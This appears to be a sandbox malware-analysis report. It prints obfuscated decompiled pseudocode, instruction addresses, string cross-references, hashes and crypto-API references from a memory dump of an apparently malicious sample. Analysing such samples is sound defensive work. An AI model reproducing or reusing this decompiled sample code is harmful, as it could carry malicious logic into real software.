							 *0x658204 = _t282;
							_t128 =  *0x65afd5; // -53
							_t283 = _t282;
							 *0x65afd8 = _t128;
							_push(_t283);
							if((_t128 & 0x000000b7) > 0) {
								if(_t128 > 0) {
									 *0x65afdb = 0xffffffffffffffdd;
								}
								 *0x658016 =  *0x658016 - 0xff;
								 *0x65afc7 =  *0x65afc7 - 0xff;
							}
							 *0x65afcc =  *0x65afcc - 0xcd;
							 *((intOrPtr*)(_t323 - 0x20)) =  *((intOrPtr*)(_t323 - 0x20)) - 0x5e67;
							_push(0x640051);
							_push(E005F3625);
							return  *(_t323 - 8);
						} else {
							goto L29;
						}
					}
				} else {
					 *(_t323 - 8) = _t97;
					_t260 = __ecx + __ecx;
					 *(_t323 - 0x10) = "Policy.6.0.Microsoft.Ink.dll";
					if(0 >= 0x37) {
						_t260 =  *0x658150; // 0x6d52
					}
					 *0x6581b8 = _t269;
					_t288 = _t269 + 0x8c6724;
					 *(_t323 - 0x14) = "_fltused";
					_t261 = _t260 + 0x6666;
					_t144 =  *(_t323 + 8);
					 *0x65afda =  *0x65afda + _t144;
					_t301 = _t293 ^ 0x00d4fd79;
					 *(_t323 - 8) = _t144;
					 *(_t323 - 0xc) = _t144;
					_t223 = "Heap32ListNext";
					 *(_t323 - 0x14) = _t223;
					if(_t223 != _t223) {
						L6:
						_t301 = _t301;
						_t223 = _t223 >> _t261;
						goto L7;
					} else {
						_t261 = _t261 + 0x609b;
						 *0x65afcf =  *0x65afcf + _t261;
						 *0x65818c = _t261;
						_t292 =  *0x6581c2; // 0x9d6c
						_t288 = _t292 - 0x8fe9;
						if((_t288 & 0x00009fae) >= 0) {
							L7:
						} else {
							_t144 =  *0x65afd6; // 0x3d
							if(_t144 >= 0) {
								goto L6;
							}
						}
					}
					 *(_t323 - 0x18) =  &(( *(_t323 - 0x18))[_t261]);
					 *(_t323 - 8) =  *( *(_t323 - 0xc) + 0x3c);
					_t153 =  *(_t323 - 8);
					_t262 = _t261 - 0x5bdb;
					 *0x65814a = _t262;
					if(_t262 >= _t262) {
						L11:
						 *(_t323 - 0xc) = _t153;
						_t232 = 0x4d21;
						 *0x65afcd =  *0x65afcd - _t262;
						_t264 = (_t262 ^ 0x00000066) - 0x61766f;
						 *0x6581b6 = _t264;
					} else {
						_t264 = 0x8347;
						_t288 = _t288 >> 0x8347;
						_t232 = 0xb5;
						 *0x65afd8 = _t153;
						_t303 = _t303 + _t301;
						if(_t153 > 0) {
							 *0x65afdc =  *0x65afdc + _t153;
							goto L11;
						}
					}
					 *0x659c95 =  *0x659c95 - _t288 - 0x9bfa;
					_t154 = _t153 +  *(_t323 + 8);
					_t233 = _t232 + 0x3ffae2;
					 *(_t323 - 8) = _t154;
					if(_t154 <= 0x1913) {
						 *(_t323 - 0x14) = 0x32c63d;
						_t233 = 0;
						_t264 = _t264 + 0x61;
					}
					_t155 =  *(_t323 - 8);
					 *(_t323 - 0x44) = _t155;
					_t266 = _t264 - 1;
					 *(_t323 - 8) = _t155;
					 *0x65afcd =  *0x65afcd - _t264 - 1;
					L00611D4B("IEShims.dll", (_t233 ^ 0x002f7377) + 0x3685ba, _t264 - 1 + _t266, 0x8f57, _t303, 1, _t264 - 1 + _t266, 1);
					 *0x6581b4 = 0x8f57;
					_t239 =  *(_t323 - 0xc);
					 *(_t323 - 0x10) =  *(_t323 - 0x10) - _t239;
					 *0x65afca =  *0x65afca + _t239;
					_push(0x63f7cf);
					_push(E0061E547);
					return "api-ms-win-core-memory-l1-1-0.dll";
				}
			}

0x0063f597
0x0063f597
0x0063f597
0x0063f597
0x0063f597
0x0063f59d
0x0063f5a0
0x0063f5a3
0x0063f5ab
0x0063fd22
0x0063fd6b
0x0063fd6b
0x0063fd24
0x0063fd24
0x0063fd29
0x0063fd31
0x0063fd39
0x0063fd3b
0x0063fd3b
0x0063fd45
0x0063fd4c
0x0063fd4f
0x0063fd58
0x0063fd60
0x0063fd69
0x00000000
0x0063fd69
0x0063fd31
0x0063fd79
0x0063fd85
0x0063fdbb
0x0063fdc1
0x0063fdc3
0x0063fd87
0x0063fd8c
0x0063fd91
0x0063fd96
0x0063fd9c
0x0063fd9e
0x0063fda7
0x0063fda7
0x0063fdae
0x0063fdb8
0x00000000
0x0063fdb8
0x0063fd9c
0x0063fdc9
0x0063fdcf
0x0063fe18
0x0063fe21
0x0063fe23
0x0063fe2f
0x0063fe32
0x0063fe3f
0x0063fe48
0x0063fe4e
0x0063fe51
0x0063fe58
0x0063fe60
0x0063fe61
0x0063fe6e
0x0063fe70
0x0063fe71
0x0063fe76
0x0063fe7e
0x0063fe83
0x0063fe8f
0x00644570
0x00644572
0x0064457a
0x006445c1
0x006445c1
0x00000000
0x0064457c
0x0064457c
0x00644580
0x00644589
0x0064458c
0x0064458f
0x00644598
0x0064459c
0x006445a0
0x006445a9
0x006445af
0x006445b5
0x006445bb
0x006445bf
0x00000000
0x00000000
0x006445cf
0x006445cf
0x006445d4
0x006445d9
0x00644598
0x006445e1
0x006445e9
0x006445ef
0x006445f8
0x006445f8
0x006445fe
0x00644605
0x00644617
0x00644621
0x00644626
0x0064462b
0x0064462e
0x0064463f
0x00644644
0x0064468b
0x00000000
0x00644646
0x0064464d
0x0064465f
0x00644666
0x00644676
0x0064467d
0x0064468d
0x0064468d
0x00644690
0x00644693
0x0064467f
0x00644689
0x00000000
0x00000000
0x00644689
0x0064467d
0x006446b1
0x0063fdd1
0x0063fdd4
0x0063fde1
0x0063fde4
0x0063fdec
0x0063fdf5
0x0063fdfa
0x0063fe06
0x0063fe0b
0x0063fe12
0x0063fe9a
0x0063fe9b
0x0063fea3
0x0063fea7
0x0063feab
0x0063feae
0x0063feae
0x0063feb1
0x0063feb7
0x0063feb7
0x0063febd
0x0063fec4
0x0063fece
0x0063fed9
0x0063fedb
0x0063fee4
0x0063fee6
0x0063feeb
0x0063feeb
0x0063ff01
0x0063ff01
0x0063ff03
0x0063ff03
0x0063ff08
0x0063ff13
0x0063ff29
0x0063ff2f
0x0063ff31
0x0063ff3a
0x0063ff47
0x0063ff51
0x0063ff57
0x0063ff63
0x0063ff68
0x0063ff68
0x0063ff6f
0x0063ff6f
0x0063ff73
0x0063ff92
0x0063ff95
0x0063ffab
0x0063ffc5
0x0063ffc6
0x0063ffde
0x0063ffe8
0x0063ffee
0x0063ffef
0x0063fff5
0x00640004
0x0064000e
0x00640010
0x00640010
0x0064001d
0x00640024
0x0064002c
0x00640031
0x00640040
0x00640046
0x0064004b
0x00640050
0x00000000
0x00000000
0x00000000
0x0063fe12
0x0063f5b1
0x0063f5b1
0x0063f5c2
0x0063f5cd
0x0063f5e2
0x0063f5ee
0x0063f5ee
0x0063f5f5
0x0063f5fc
0x0063f615
0x0063f621
0x0063f626
0x0063f62b
0x0063f631
0x0063f63f
0x0063f644
0x0063f647
0x0063f64c
0x0063f652
0x0063f685
0x0063f68b
0x0063f693
0x00000000
0x0063f654
0x0063f654
0x0063f659
0x0063f65f
0x0063f666
0x0063f66d
0x0063f677
0x0063f696
0x0063f67b
0x0063f67b
0x0063f683
0x00000000
0x00000000
0x0063f683
0x0063f677
0x0063f69d
0x0063f6ab
0x0063f6b3
0x0063f6c4
0x0063f6c9
0x0063f6d2
0x0063f712
0x0063f712
0x0063f71e
0x0063f723
0x0063f72c
0x0063f732
0x0063f6d4
0x0063f6db
0x0063f6df
0x0063f6e8
0x0063f6ec
0x0063f6f2
0x0063f6fd
0x0063f6ff
0x00000000
0x0063f70d
0x0063f6fd
0x0063f741
0x0063f747
0x0063f74a
0x0063f750
0x0063f757
0x0063f75f
0x0063f762
0x0063f764
0x0063f764
0x0063f767
0x0063f772
0x0063f775
0x0063f776
0x0063f78b
0x0063f798
0x0063f79d
0x0063f7ac
0x0063f7af
0x0063f7b2
0x0063f7c4
0x0063f7c9
0x0063f7ce
0x0063f7ce

Strings

pB$, xrefs: 006445CF
api-ms-win-core-memory-l1-1-0.dll, xrefs: 0063F5D8, 0063F7BF
NlsLexicons0047.dll, xrefs: 0063FEF9
WmiApSrv.exe, xrefs: 0063FD8C
_fltused, xrefs: 0063F610
Heap32ListNext, xrefs: 0063F647
RtlIpv4StringToAddressW, xrefs: 0063F6B6
Policy.6.0.Microsoft.Ink.dll, xrefs: 0063F5BB, 0063F5E4
dwmcore.dll, xrefs: 0063FDE7
IEShims.dll, xrefs: 0063F779

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: Heap32ListNext$IEShims.dll$NlsLexicons0047.dll$Policy.6.0.Microsoft.Ink.dll$RtlIpv4StringToAddressW$WmiApSrv.exe$_fltused$api-ms-win-core-memory-l1-1-0.dll$dwmcore.dll$pB$
API String ID: 0-1438800944
Opcode ID: d79a334aa06eea4c5b912b0c8a71d396870fadf8dbcd78e55218b30d2d7f72cd
Instruction ID: f5fd89c6f5bb7e1d259dcf5ba56ca1811e67a44b0c8586623e3c1ec35e669570
Opcode Fuzzy Hash: d79a334aa06eea4c5b912b0c8a71d396870fadf8dbcd78e55218b30d2d7f72cd
Instruction Fuzzy Hash: 6F02D076E547468FCB01DFB9E8942C97FB3EB29311F08917AC844E7721E6740A46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006280A1 Relevance: 12.8, Strings: 10, Instructions: 260
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E006280A1(intOrPtr __eax, void* __edx) {
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				char _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t97;
				intOrPtr _t98;
				intOrPtr _t116;
				intOrPtr _t123;
				intOrPtr _t148;
				void* _t150;
				signed char _t152;
				signed short _t172;
				unsigned short _t185;
				signed short _t186;
				void* _t187;

				 *0x658629 = __eax;
				 *((intOrPtr*)(_t187 - 8)) = __eax;
				 *0x658da9 = 0x339296;
				 *0x65afca =  *0x65afca + 0x339296 + 0x339296;
				 *0x658df9 = 0x67252c;
				 *0x65817c = 0x6ae6;
				_t172 = __edx + 0x8d;
				 *0x65afd3 =  *0x65afd3 + _t172;
				if((_t172 & 0x0000a217) >= 0) {
					 *0x65afd9 = 0xcd;
					 *0x65afc6 = 0xffffffffffffffd8;
				}
				_t53 =  *((intOrPtr*)(_t187 - 8));
				 *0x65814c = 0;
				 *0x6581d0 = _t172;
				_t173 = _t172;
				if(_t53 != 1) {
					 *((intOrPtr*)(_t187 - 8)) = _t53;
					_t148 =  *0x65813c; // 0x5d6c
					 *0x65813e =  *0x65813e + _t148;
					_t150 = _t148 + _t148 + 0x77b6;
					 *0x6581da = _t173;
					_t97 = "GetThreadWaitChain";
					 *0x6580f2 =  *0x6580f2 + _t97;
					_t98 = _t97 - _t150;
					_t152 = _t150 + 0x00571745 | 0x00000073;
					_t57 =  *((intOrPtr*)(_t187 - 8));
					if( *((intOrPtr*)(_t187 - 0x2050)) > 0) {
						_t186 = 0;
						if(0 < 0) {
							 *0x65afdc = _t57;
							_t98 = _t57 + _t57 + 1;
						}
						if(_t98 == _t98) {
							_t152 = 0x72f6;
							 *0x659785 =  *0x659785 - 0x72f6;
							_t173 = 0xffffffffff6e76eb;
							 *0x65afd5 =  *0x65afd5 - _t57;
							if((_t186 & 0x0000b9ec) < 0) {
								 *0x65aae6 =  *0x65aae6;
								_t98 =  *0x65afdc; // -49
							}
							 *0x658445 =  *0x658445;
						}
						_t123 =  *((intOrPtr*)(_t187 - 0xc));
						_push( *((intOrPtr*)(_t187 - 0x2050)));
						if(((_t152 >> _t152) + 0x0061e904 - 0x00000001 & 0x000084d2) != 0) {
							 *0x6581d4 = _t173;
							 *0x65afd6 = _t57;
							 *0x65afd6 = _t57;
							_t123 = _t123 - _t57;
							_t186 = _t186 - 0xd3aa;
						}
						 *((intOrPtr*)(_t187 - 8)) = _t57;
						_t67 =  *((intOrPtr*)(_t187 - 8));
						 *((intOrPtr*)(_t187 - 8)) = _t123 - 0x38;
						_push( *((intOrPtr*)(_t187 - 0x2054)));
						_t152 =  *0x658188; // 0x2f10
						_t173 = 0x86e9;
						if(0x86c9 >= 0) {
							_t173 = 0x10e83;
							 *0x65afd6 =  *0x65afd6 + _t67;
							if(_t186 >= 0) {
								if(_t186 < 0) {
								}
								 *0x65adee =  *0x65adee;
							}
						}
						 *0x658052 =  *0x658052 + _t67;
						_push( *((intOrPtr*)(_t187 - 0x2070)));
						_t68 = E00620418(_t67, _t67, _t173, 0, _t186);
						_t185 = _t186 - 0xb06c;
						 *((intOrPtr*)(_t187 - 8)) = _t68;
						if("RtlIpv4StringToAddressW" >= 0x4421) {
							L21:
							 *0x65ae9e =  *0x65ae9e;
							_t68 = 0;
						} else {
							_t152 = 0x658177;
							if(0x658116 >= 0x658116) {
								_t152 =  *0x6581b2; // 0x8e63
								_t173 = (0x92f9 >> _t152) + (0x92f9 >> _t152);
								_t185 = _t185 >> _t152;
								goto L21;
							}
						}
						_t57 =  *((intOrPtr*)(_t187 - 8));
						if (_t57 != 1) goto L23;
					}
					 *((intOrPtr*)(_t187 - 0x10)) =  *((intOrPtr*)(_t187 - 0x10)) - _t152;
					 *((intOrPtr*)(_t187 - 8)) = _t57;
					 *0x658150 = _t173;
					_t59 =  *((intOrPtr*)(_t187 - 8));
					 *0x6581a4 =  *0x6581a4 + 0x93ec;
					_push( *((intOrPtr*)(_t187 - 0x204c)));
					 *((intOrPtr*)(_t187 - 8)) = _t59;
					 *((intOrPtr*)(_t187 - 8)) = _t59;
					 *0x65afcc =  *0x65afcc + 0x347ef7;
					_t61 =  *((intOrPtr*)(_t187 - 8));
					_t116 = "api-ms-win-core-errorhandling-l1-1-0.dll" - _t61;
					 *((intOrPtr*)(_t187 - 8)) = _t61;
					_t62 = _t61 - 0x2cda;
					if(_t116 < 0x365eb5) {
						 *0x658e29 = _t116;
						 *0x65819a = 0xffffffffffa64600;
						if(0x260200 < 0) {
							 *0x658222 = 0x9482;
							_t62 = 0xc6;
						}
						 *0x65afd9 = _t62;
						if(0 >= 0) {
						}
						_t116 = 0;
					}
					_push(0x628899);
					_push( &M005F8C55);
					return  *((intOrPtr*)(_t187 - 8));
				} else {
					 *((intOrPtr*)(_t187 - 8)) = _t53;
					 *0x658d91 =  *0x658d91 - 0x4486b8;
					 *((intOrPtr*)(_t187 - 0xc)) =  *((intOrPtr*)(_t187 - 0xc)) + 0x87;
					_push(0);
					_push(0x10e);
					_push(E00628178);
					_push(L005F5A88);
					return 0x330f6e;
				}
			}

0x006280a8
0x006280af
0x006280b7
0x006280ce
0x006280d4
0x006280e3
0x006280ed
0x006280f0
0x006280fb
0x00628107
0x00628114
0x00628125
0x0062812c
0x0062812f
0x0062813c
0x00628143
0x00628148
0x00628582
0x00628594
0x006285ab
0x006285b8
0x006285bd
0x006285cc
0x006285d1
0x006285d8
0x006285e1
0x006285e4
0x006285ee
0x006285f4
0x006285f8
0x006285fa
0x0062860f
0x0062860f
0x00628613
0x0062861f
0x00628623
0x0062862c
0x00628632
0x0062863d
0x00628643
0x0062864b
0x0062864b
0x00628651
0x00628651
0x00628668
0x0062866b
0x00628680
0x00628682
0x00628694
0x0062869a
0x006286a0
0x006286a2
0x006286a2
0x006286a7
0x006286ad
0x006286b0
0x006286b3
0x006286bb
0x006286c2
0x006286cb
0x006286d3
0x006286d6
0x006286de
0x006286e3
0x006286e3
0x006286e7
0x006286e7
0x006286de
0x006286f6
0x00628700
0x00628708
0x0062870d
0x00628712
0x0062871f
0x0062874e
0x00628756
0x0062875e
0x00628723
0x00628729
0x0062872e
0x00628733
0x00628741
0x00628749
0x00000000
0x0062874c
0x0062872e
0x00628773
0x00628779
0x00628779
0x0062877b
0x00628785
0x00628793
0x006287c7
0x006287ca
0x006287d1
0x006287e4
0x006287e7
0x006287ef
0x0062881b
0x00628823
0x00628825
0x00628828
0x00628832
0x00628834
0x00628843
0x00628850
0x00628855
0x00628861
0x00628861
0x00628863
0x0062886f
0x0062886f
0x00628882
0x00628882
0x0062888e
0x00628893
0x00628898
0x0062814e
0x0062814e
0x00628156
0x00628164
0x0062816a
0x0062816c
0x0062816d
0x00628172
0x00628177
0x00628177

Strings

srcore.dll, xrefs: 0062880D
GetThreadWaitChain, xrefs: 006285CC
_fltused, xrefs: 00628788
RtlIpv4StringToAddressW, xrefs: 00628715
ehui.dll, xrefs: 006287DF
IEShims.dll, xrefs: 00628606
api-ms-win-core-errorhandling-l1-1-0.dll, xrefs: 0062881E
CreateDisc.dll, xrefs: 00628120
d3d10core.dll, xrefs: 0062858D, 006287B3
VarFormatDateTime, xrefs: 00628661

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$GetThreadWaitChain$IEShims.dll$RtlIpv4StringToAddressW$VarFormatDateTime$_fltused$api-ms-win-core-errorhandling-l1-1-0.dll$d3d10core.dll$ehui.dll$srcore.dll
API String ID: 0-4129309232
Opcode ID: 5a6a099cbca5b729bdd3eb8b5c175377d0c16062d575e074bce2ac16b75eda85
Instruction ID: e015750aac551253df255e47ab971320251221b554a9c9ec70f864a0a33c054c
Opcode Fuzzy Hash: 5a6a099cbca5b729bdd3eb8b5c175377d0c16062d575e074bce2ac16b75eda85
Instruction Fuzzy Hash: D2A10175A50B469FCB00DFB8EC942C97FB3EB29322F04526EC945A7B62E6740946CB05

Uniqueness

Uniqueness Score: -1.00%

Function 005FC60A Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 167encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32(00000000,00000000,?,?,?), ref: 005FC860

Strings

rpcref.dll, xrefs: 005FC6B3
winresume.exe, xrefs: 005FC62F
RtlIpv4StringToAddressW, xrefs: 005FC73C
ehui.dll, xrefs: 005FC847
CreateDisc.dll, xrefs: 005FC7DF
e/;, xrefs: 005FC6AE

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: CryptDataHash
String ID: CreateDisc.dll$RtlIpv4StringToAddressW$e/;$ehui.dll$rpcref.dll$winresume.exe
API String ID: 4245837645-2647116237
Opcode ID: 979f60880b2bcf366bddc3c8c239103d84fb804a494336392e902633eba208f5
Instruction ID: 681b19397043213c4e676532df43ae123ae882da9541066fa8e70153cb650c41
Opcode Fuzzy Hash: 979f60880b2bcf366bddc3c8c239103d84fb804a494336392e902633eba208f5
Instruction Fuzzy Hash: 025103B6A4430A8FCB01DFB8EC946D93FB3EB69311F08627AD944A7761E7780505CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0062C00C Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0062C00C(signed int __edx, void* __edi) {
				signed int _t55;
				char _t56;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				void* _t61;
				signed int _t62;
				intOrPtr _t65;
				signed int _t66;
				signed int _t72;
				void* _t77;
				char _t79;
				void* _t80;
				char _t81;
				signed int _t89;
				intOrPtr _t95;
				signed int _t113;
				signed int _t120;
				void* _t127;
				intOrPtr _t140;
				signed int _t157;
				intOrPtr _t160;
				signed int _t168;
				void* _t172;
				signed int _t174;
				signed int _t188;
				signed int _t190;
				signed char _t196;
				signed int _t198;
				signed int _t218;
				signed char _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				unsigned short _t238;
				void* _t240;
				void* _t242;
				signed int _t243;
				void* _t245;
				intOrPtr* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t262;
				signed int _t269;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				short _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t296;

				_t218 = __edx;
				_t89 =  *(_t296 - 8);
				if(0x4cd0dd < 0x4cd0dd) {
					L5:
					 *(_t296 - 8) =  *(_t296 - 8) + _t89;
					L6:
					_t157 =  !0x6e58;
					_pop(_t238);
					_t262 =  *((intOrPtr*)(_t296 + 8));
					do {
						if(_t89 >= 0x3b) {
							 *0x658160 =  *(_t296 - 8);
							_t157 = 0x73eba5;
						}
						 *0x6581fc = _t218;
						_t56 =  *_t238;
						 *0x6581ca = _t218;
						_t218 = 0xa1d5;
						_push(_t262);
						_push(_t238);
						if(_t238 >> _t157 + _t56 - 0xd5 != 0) {
							 *0x658691 = _t56;
						}
						 *(_t296 - 8) = _t89;
						_t160 =  *0x658132; // 0x9f48
						_t157 = _t160 + 0x59825a;
						 *0x659d21 =  *0x659d21 - _t218;
						 *0x65afd6 = _t56;
						_t58 = _t56;
						_pop(_t240);
						_pop(_t262);
						_t89 =  *(_t296 - 8);
						_t238 = _t240 + 1;
						_t59 = _t58;
					} while (_t59 != 0);
					_push(_t262 - _t238);
					_push(_t238);
					 *0x65afda = _t59;
					 *(_t296 - 8) = _t89;
					 *(_t296 - 0x14) = _t59;
					if(_t59 >= 0) {
						 *0x65afdb =  *0x65afdb + _t59;
					}
					if(_t238 < 0x31c) {
					}
					_t95 =  *0x658c99; // 0x0
					 *0x658efd =  *0x658efd - _t95;
					 *0x65afcd =  *0x65afcd + _t95;
					_t60 =  *(_t296 - 0x14);
					_pop(_t241);
					_pop(_t267);
					_t168 =  *(_t296 - 8);
					 *(_t296 - 8) = 0;
					 *0x658e49 = 0;
					if(_t60 >= 7) {
						 *0x658c09 =  *0x658c09 + 0x22d2fa;
						 *0x658150 = _t168;
						if(_t168 > _t168) {
							_t168 = _t168 - 0x7f;
							 *0x6597f1 =  *0x6597f1 - _t218;
							 *0x6581ec = _t218;
							 *0x65afd8 = _t60;
						}
						 *0x65afdb =  *0x65afdb - _t60;
					}
					 *0x658775 =  *0x658775 + _t60;
					 *0x6588a5 = _t60;
					_pop(_t242);
					_pop(_t269);
					_t172 = _t269;
					_t243 = _t242 + _t172;
					 *0x65afdc = _t60;
					_t174 = _t172 + _t60 + 0x106bd0;
					 *0x65afc8 =  *0x65afc8 - _t60;
					_push(_t269);
					_t271 =  !_t269 - 0xc13448;
					_push(_t243);
					_push(_t60);
					_t61 = _t60 + 0xda;
					 *0x65afdb =  *0x65afdb + _t61;
					if(_t243 >= 0) {
						_t81 = _t61 - 0x1b;
						 *0x658909 = _t81;
						 *0x65902d = 0x49d2;
						if(_t174 != _t174) {
							_t174 = 0x658161;
							 *0x6581ae = 0x658161;
							 *0x65afd6 = _t81;
							_t271 = _t271 + _t271;
						}
						if(_t271 == 0) {
							_t243 =  !_t243;
						}
					}
					_pop(_t62);
					_pop(_t245);
					_pop(_t273);
					_t113 =  *(_t296 - 8);
					_t274 =  !_t273;
					while(1) {
						_t275 = _t274;
						if(_t275 == 0) {
							break;
						}
						 *0x659bb5 =  *0x659bb5;
						_push(_t275);
						_push(_t245);
						 *0x65afda = _t62;
						 *(_t296 - 8) = _t113;
						 *0x658156 =  *0x658156 + 0x562b8a;
						_push(0);
						if(0 != 0) {
							 *0x65afd8 = _t62;
						}
						 *0x65afdc = _t62;
						_t225 = _t62;
						_pop(_t246);
						_pop(_t277);
						_t65 =  *_t246;
						_t180 = 0x1babbf;
						_t120 =  *(_t296 - 8);
						if(_t65 < 0x41) {
							_t66 = _t65 - 0x30;
						} else {
							_t80 = _t65 - 0x57;
							asm("adc dl, 0x0");
							_t225 = _t225 << 5;
							 *(_t296 - 8) = _t120;
							 *0x659015 = _t120;
							_t180 = 0x72b92d;
							if(0x1babbf < 0x1babbf) {
								_t140 =  *0x6581e0; // 0x987f
								 *0x658232 = _t277;
								_t120 = _t140 - _t277;
							}
							_t120 =  *(_t296 - 8);
							_t66 = _t80 + _t225;
						}
						 *0x658180 = _t180;
						_push(_t225);
						_push(_t277);
						if(_t277 == 0) {
							 *0x65afdc = _t66;
						}
						_pop(_t278);
						_pop(_t227);
						_t188 = _t278 - 1;
						 *(_t296 - 0xc) = _t188;
						_t190 = _t188 | 0x0062cf0d;
						if((_t227 & 0x00008db5) > 0) {
							_t190 = _t190 + 0xa0;
						}
						_t248 = _t246;
						_t279 = _t278;
						_t196 =  *(_t296 - 0xc) << 2;
						 *(_t296 - 8) = (_t66 & 0x0000000f) << _t196;
						_t72 =  *(_t296 - 8);
						 *(_t296 - 0xc) = _t196;
						_t198 =  *(_t296 - 0xc);
						_push(_t248);
						 *(_t296 - 8) = _t72;
						 *(_t296 - 0xc) = _t120 + _t72;
						if(_t198 > _t198) {
							L40:
							 *0x658875 = "NetMessageNameGetInfo";
							goto L41;
						} else {
							if((_t227 & 0x00008435) < 0) {
								L41:
								_t62 =  *(_t296 - 8);
								_pop(_t251);
								_t245 = _t251 + 1;
								 *(_t296 - 8) =  *(_t296 - 0xc);
								_t125 = 0x4f1b;
								 *(_t296 - 0xc) = _t198;
								_push(_t227);
								_t228 =  !_t227;
								_push(_t279);
								 *0x65afd8 = _t62;
								if(_t279 != 0) {
									L45:
									 *0x658fe9 = _t125;
									_t229 = _t228 - 0x99;
									 *0x658210 =  *0x658210 + _t229;
									if((_t229 & 0x0095ab72) <= 0) {
										L49:
										 *0x6584f9 = _t62;
										_t113 =  *(_t296 - 8);
										_t174 =  *(_t296 - 0xc);
										_pop(_t280);
										_pop(0);
										_t274 = _t280 - 1;
										continue;
									}
									L47:
									 *0x65afda = _t62;
									L48:
									_t125 =  *0x65afdb; // 0x5c
									goto L49;
								}
								if(_t245 != 0) {
									goto L48;
								}
								if(_t62 >= 0x20d8) {
									goto L47;
								}
								_t125 = 0xf5088 - _t62 + 0x82;
								goto L45;
							}
							_t79 =  *0x65afd9; // 0x34
							 *0x65afdb = _t79;
							goto L40;
						}
					}
					_push(_t275);
					_push(_t245);
					if(_t62 == 0) {
					}
					if(_t113 < _t113) {
						 *0x658132 =  *0x658132 - _t174;
					}
					 *(_t296 - 0xc) = _t174;
					 *0x6581d0 = 0;
					_push(0);
					 *(_t296 - 8) = _t62;
					_t127 = _t113;
					_pop(_t231);
					_t77 = _t127;
					return _t77;
				}
				 *0x6581d4 = __edx;
				if((__edx & 0x00000097) < 0) {
					L3:
					if(_t55 == 0x18) {
						goto L6;
					}
					L4:
					goto L5;
				}
				_t218 =  *0x658226; // 0x570
				_t55 =  *0x65afdc; // -49
				if(__edi <= 0x7d9) {
					goto L4;
				}
				goto L3;
			}

0x0062c00c
0x0062c00c
0x0062c017
0x0062c05b
0x0062c063
0x0062c069
0x0062c06d
0x0062c06f
0x0062c071
0x0062c074
0x0062c077
0x0062c07e
0x0062c087
0x0062c087
0x0062c08d
0x0062c096
0x0062c098
0x0062c0a6
0x0062c0aa
0x0062c0b2
0x0062c0b9
0x0062c0bd
0x0062c0c4
0x0062c0c6
0x0062c0d0
0x0062c0d7
0x0062c0de
0x0062c0e4
0x0062c0f2
0x0062c0f3
0x0062c0f4
0x0062c0f5
0x0062c0f8
0x0062c0f9
0x0062c0f9
0x0062c105
0x0062c109
0x0062c10a
0x0062c10f
0x0062c120
0x0062c125
0x0062c127
0x0062c127
0x0062c132
0x0062c132
0x0062c13e
0x0062c144
0x0062c14a
0x0062c152
0x0062c158
0x0062c159
0x0062c167
0x0062c16a
0x0062c16d
0x0062c186
0x0062c193
0x0062c1a2
0x0062c1ab
0x0062c1ad
0x0062c1b0
0x0062c1b6
0x0062c1c7
0x0062c1d3
0x0062c1d5
0x0062c1dd
0x0062c1e4
0x0062c1ea
0x0062c205
0x0062c206
0x0062c208
0x0062c209
0x0062c20b
0x0062c212
0x0062c218
0x0062c224
0x0062c22f
0x0062c23a
0x0062c23d
0x0062c23e
0x0062c241
0x0062c249
0x0062c24b
0x0062c24d
0x0062c25c
0x0062c265
0x0062c26d
0x0062c26e
0x0062c286
0x0062c28c
0x0062c28c
0x0062c290
0x0062c292
0x0062c292
0x0062c290
0x0062c2a9
0x0062c2aa
0x0062c2ab
0x0062c2ac
0x0062c2b1
0x0062c4ef
0x0062c4ef
0x0062c4f1
0x00000000
0x00000000
0x0062c2bf
0x0062c2c7
0x0062c2ce
0x0062c2cf
0x0062c2d4
0x0062c2e5
0x0062c2f3
0x0062c2f9
0x0062c303
0x0062c30b
0x0062c311
0x0062c31c
0x0062c31d
0x0062c31e
0x0062c322
0x0062c324
0x0062c333
0x0062c338
0x0062c376
0x0062c33a
0x0062c33a
0x0062c33c
0x0062c33f
0x0062c342
0x0062c345
0x0062c351
0x0062c354
0x0062c359
0x0062c360
0x0062c367
0x0062c367
0x0062c36f
0x0062c372
0x0062c372
0x0062c378
0x0062c385
0x0062c388
0x0062c391
0x0062c39b
0x0062c3a2
0x0062c3b5
0x0062c3b6
0x0062c3b7
0x0062c3ba
0x0062c3c3
0x0062c3ca
0x0062c3cc
0x0062c3cc
0x0062c3e0
0x0062c3e1
0x0062c3e5
0x0062c3ea
0x0062c3f6
0x0062c3f9
0x0062c400
0x0062c403
0x0062c404
0x0062c409
0x0062c40e
0x0062c436
0x0062c440
0x00000000
0x0062c410
0x0062c41e
0x0062c445
0x0062c44f
0x0062c455
0x0062c456
0x0062c457
0x0062c45d
0x0062c462
0x0062c46e
0x0062c46f
0x0062c474
0x0062c475
0x0062c47e
0x0062c4a6
0x0062c4a6
0x0062c4bc
0x0062c4bf
0x0062c4cc
0x0062c4de
0x0062c4e1
0x0062c4e6
0x0062c4e9
0x0062c4ec
0x0062c4ed
0x0062c4ee
0x00000000
0x0062c4ee
0x0062c4d0
